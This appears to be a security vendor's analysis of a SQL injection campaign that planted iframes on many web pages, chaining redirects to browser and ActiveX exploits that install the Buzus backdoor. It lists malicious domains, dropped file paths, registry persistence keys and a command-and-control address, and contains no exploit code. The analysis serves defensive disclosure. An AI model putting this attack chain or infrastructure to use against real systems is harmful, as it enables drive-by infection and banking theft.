A recent SQL injection attack that started in late November has currently compromised over 125,000 Web pages according to a Google search for the iframe. Yesterday, the same search revealed 121,000 so the number may be growing. The injected iframe loads the first stage of malicious content from 318x.com. A series of iframes and code redirections (invisible to the user) then ensues, culminating in a rather curious method for managing the final payload (the actual malware delivery).

When users visit a compromised Web page, the injected iframe executes a script that creates a new iframe to 318x.com/a.htm. That iframe (a.htm) does 2 things:

• Loads a second iframe from aa1100.2288.org/htmlasp/dasp/alt.html;
• Loads a script: js.tongji.linezing.com/1358779/tongji.js (used for tracking).

The aa1100.2288.org/htmlasp/dasp/alt.html iframe then:

• Creates a third iframe pointing to aa1100.2288.org/htmlasp/dasp/share.html;
• Loads a script: js.tongji.linezing.com/1364067/tongji.js (similar to above, but different tracking number);
• If <noscript> it has an href tag that points to www.linezing.com with an img src of img.tongji.linezing.com/1364067/tongji.gif.

All fairly common techniques. But once it gets to share.html, things get interesting. As its name implies, share.html is acting as a master file to include other components of the attack. Over a dozen other script files are called through a convoluted chain of iframes and src references largely dependent on the browser type, version of Flash, and related criteria.

The attack appears to be a work-in-progress; as we've been monitoring the malware scripts used in the final stage attacks, some scripts are being changed, some removed, and new ones are being introduced. Many of the files have .jpg extensions, but all are simply .js files. Interestingly, the one thing we would expect to see most has not yet appeared during our investigation - the now almost obligatory PDF exploits. Instead, the attacker is focusing on a rather odd assortment:

• Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
• MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
• Microsoft Office Web Components vulnerabilities described in MS09-043
• Microsoft video ActiveX vulnerability described in MS09-032
• Internet Explorer Uninitialized Memory Corruption Vulnerability – MS09-002

Successful exploit leads to the silent installation of Backdoor.Win32.Buzus.croo from windowssp.7766.org. Keeping with the phony extension ruse, the binary is delivered as a .css file. Once on the system, the rootkit-enabled Buzus.croo drops the following files to the specified folder:

• %UserProfile%\ammxv.drv
• %ProgramFiles%\Common Files\Syesm.exe

The trojan then modifies the Registry to load when Windows is started:

    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\DrvKiller
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\DrvKiller\Security
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\DrvKiller
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\DrvKiller\Security

Backdoor.Win32.Buzus.croo then attempts to contact 121.14.136.5 via port 80 and sends a POST request to hxxp://dns.winsdown.com.cn/Countdown/count.asp.

The Buzus family of trojans typically are remotely controlled via an IRC backdoor and typically are engaged in credit card and other banking-related theft.

Detection of the trojan is spotty, with 22/40 antivirus vendors detecting the variant according to this VirusTotal report.